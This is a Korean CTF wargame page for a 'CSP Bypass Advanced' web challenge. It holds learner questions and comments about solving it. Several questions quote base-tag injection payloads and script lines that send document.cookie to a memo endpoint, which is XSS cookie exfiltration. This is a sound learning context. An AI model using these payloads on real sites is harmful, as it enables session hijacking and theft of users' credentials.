학습
워게임
CTF
커뮤니티
랭킹
스토어
커리어
Beta
로그인
|
기업 서비스
Home
학습
워게임
CTF
커뮤니티
랭킹
커리어
Beta
기업 서비스로 이동하기 >
LEVEL 3
CSP Bypass Advanced
web
2123
775
2022.03.31. 11:52:57
로그인 하고 문제 풀기
문제 정보
풀이
41
난이도 투표
130
질문
27
최근 풀이자
775
댓글
36
문제 설명
Description
Exercise: CSP Bypass의 패치된 문제입니다.
문제 수정 내역
2023.08.07 Dockerfile 제공
Translate
난이도 투표
130
문제 풀이를 완료한 후에 피드백을 제출할 수 있습니다.
투표 결과
전체 투표 로그
1 / 26
싹튼감자
대표 업적 없음
LEVEL 3에 투표했습니다.
5일 전
cmdking
대표 업적 없음
LEVEL 3에 투표했습니다.
6일 전
팡현2
대표 업적 없음
LEVEL 3에 투표했습니다.
24일 전
준다이
Lucky 7
LEVEL 3에 투표했습니다.
1개월 전
R1kk4
대표 업적 없음
LEVEL 3에 투표했습니다.
1개월 전
질문
26
문제 풀이에 어려움이 있으신가요?
커뮤니티에서 문제에 대한 질문하고 답변 얻기
csp bypass와 advanced
csp bypass와 advanced의 차이가 궁금합니다 csp bypass에서 사용된 페이로드가 csp bypass advanced 에서 먹히지 않는 이유를 잘 모르겠습니다. return과 render template 의 차이라는 것 까지는 어디선가 들어왔는데, 자세한 내용과 원리를 알고 싶습니다.
midas25
답변
1
추천
0
1년 전
질문드립니다..
강의에 나온대로 base-uri방식으로 진행하려 하는데 잘 안되네요..개인 서버에 static/js 경로에 jquery.min.js파일을 만들고 base태그를 사용해서 <script src="/vuln?param='<base href='http://IP_addr/'>'"> <base href='http://IP_addr/'> 두 방법으로 시도했는데 잘 안되네요.. 스크립트 파일 안에는 document.location='http://host3.dreamhack.games:port/memo?memo='+document.cookie같이 작성했습니다.. 혹시 이 부분에서 잘못된것이 있을까요 아니면 방향이 틀린걸까요..ㅜ
SuuuuuuuuuK
답변
1
추천
0
3년 전
location.href 경로 설정
안녕하세요. location.href 경로 설정에 있어서 도움을 얻고자 질문을 드리게 되었습니다. 저는 우선 github에서 서버를 여는 방식을 선택했습니다. 첫 번째 시도했을 때는 repository를 webtest로 만들고, 그 안에 /static/js/jquery.min.js 경로를 가지는 파일을 만들었고, vuln 페이지에서 param을 <base href="https://이름.github.io/webtest" /> 로 전달하였는데, 실패했습니다. 두 번째 시도했을 때는 repository를 static으로 만들고, 그 안에 /js/jquery.min.js 경로를 가지는 파일을 만들었고, vuln 페이지에서 param을 <base href="https://이름.github.io/" /> 로 전달하였는데,성공했습니다. 웹 브라우저에서 두 경로를 접속하면, location.href = "http://127.0.0.1:8000/memo?memo="+document.cookie; 가 올바르게 나옵니다. base 뒤에 똑같이 /static/js/jquery.min.js이 붙는데, 왜 첫 번째 경우는 안되는 것인지 궁금합니다. 읽어주셔서 감사합니다.
탈퇴한 이용자
답변
1
추천
0
1년 전
localhost에서 연결거부
제 깃허브 레포지토리 이용해서 /static/js/bootstrap.min.js 에 다음과 같이 location.href = "http://127.0.0.1:8000/memo?=memo"+document.cookie 삽입했습니다. 개발자 도구에서 해당 스크립트를 받아오는지 까지 확인을 한 결과, source에서 bootstrap.min.js 확인시, 잘 받아옵니다. 한데, 곧이어 127.0.0.1 에서 연결을 거부했다는 오류가 뜨네요 .. 이유가 뭘까요?
나혼자다락방
답변
1
추천
0
1년 전
base 태그 wrong?? 뜨는 이유가 궁금합니다
/vuln 페이지에선 정상 작동하는 스크립트가 /flag 페이지에선 wrong?? 분출하며 막힙니다.. 개인 PC에 문제파일을 다운로드받아 실행시켜보니 Chrome driver 및 selenium 문제라 해서 해결하고 스크립트 사용해보니 flag.txt를 정상적으로 읽어오는 것 같긴하더라구요.. 제가 놓치고 있는 부분이 무엇인지 감이 안 잡힙니다..
halee
답변
1
추천
0
4개월 전
개인 서버 관련 질문입니다
개인 서버를 이용하여 풀어야 한다는 건 알았는데... 혹시 개인 서버를 갖고 있는 것이 당연한 건가요 ㅜㅜㅜ 문제 하나 풀려고 도메인부터 웹 호스팅 서비스를 구입하기에는 조금 부담스러운 처지인데, 다른 분들은 이런 부분을 어떻게 해결했는지 여쭙고 싶습니다
hibrian827
답변
1
추천
0
3년 전
해당 문제에서 nonce의 기능
해당 문제를 base uri를 이용하는 방식으로 풀었는데, vuln페이지에 있는 nonce 속성은 어떻게 기능하기에 왜 들어간 건가요? 해당 문제에서 nonce가 차지하는 부분은 없다고 봐도 무방한가요?
reiki
답변
1
추천
0
1년 전
wrong이라고 뜨네요
base-uri를 허용하지 않는다는 CSP 구문이 없으니 base-uri을 이용하여 풀이를 한다는 점을 알게 되었습니다. 그리고 기존에 올라온 질문들을 보니 개인서버도 필요하다고 하니 가상머신 실행 후 아파치 설치하고 /var/www/html 폴더에 /static/js 폴더 생성 후 거기에 쿠키를 빼올 스크립트 파일도 작성하고 base 구문을 /vuln 페이지에 입력했는데 'wrong?'이라고 뜹니다.
폐지줍기장인
답변
1
추천
0
4개월 전
질문드립니다
vuln 페이지에서 base 태그로 개인 서버의 자바스크립트 실행해서 memo에 빈칸 나오는 것 까지는 확인햇습니다 그런데 flag 페이지에서는 계속 wrong이 뜨네요... 그리고 자바스크립트 파일에 코드를 밑에처럼 넣으면 안되는 이유가 무엇인가요? location.href = "http://host3.dreamhack.games:{port}/memo?memo="+document.cookie
Judol
답변
0
추천
0
2년 전
살려주세요
<script src=/vuln?param=<script>alert(1)</script>></script> 대략 이런식으로 vuln 페이지에서 테스트 해보았을때 html 코드를 받아와 작동이 안되는 것같습니다. script 태그의 type 도 혹시나하여 text/html 로 변경해 보았는데 실패했습니다. 문제가 아예 지전이 없네요 힌트등.. 도움을 주시면 감사하겠습니다.
하면된다
답변
1
추천
0
3년 전
«
‹
1
2
3
›
»
LEVEL 3
CSP Bypass Advanced
web
2123
775
2022.03.31. 11:52:57
로그인 하고 문제 풀기
출제자 정보
Dreamhack
대표 업적 없음
Dreamhack official account
First Blood!
as3617
워게임 고인물
출제된 지
3시간
만에 풀이 완료!
최근 풀이자
775
lym12
대표 업적 없음
1일 전
Sbug
대표 업적 없음
2일 전
Jistan
대표 업적 없음
3일 전
아트르
대표 업적 없음
3일 전
faper
대표 업적 없음
3일 전
싹튼감자
대표 업적 없음
5일 전
cmdking
대표 업적 없음
6일 전
abcdeffffff
대표 업적 없음
14일 전
Taemin
웹해킹 중급자
21일 전
내룡해커
대표 업적 없음
21일 전
«
‹
1
2
3
4
5
›
»
댓글
36
Rootsquare
바탈리온
2개월 전
스크립트를 새로 만들 수 없어 보이네? 그렇다면...
Translate
어제의 나보다 나아진 오늘을 희망하며
웹해킹 고인물
4개월 전
어제의 나보다 나아진 오늘을 희망하며
Translate
Ming9
2023 Christmas CTF 참여
5개월 전
놀라운
Translate
Bananapie
대표 업적 없음
8개월 전
요이
Translate
Waivey
웹해킹 입문
1년 전
이중공유기 이슈
Translate
O_F
대표 업적 없음
2년 전
새로웠습니다.
Translate
isotope
대표 업적 없음
2년 전
repl.it도 좋은 서버 도구네요.
Translate
여갱
대표 업적 없음
2년 전
어려워요
Translate
연님
답변 등록: 1
2년 전
따봉
Translate
Finder
대표 업적 없음
2년 전
개인서버를 사용해야한다
Translate
«
‹
1
2
3
4
›
»
댓글 36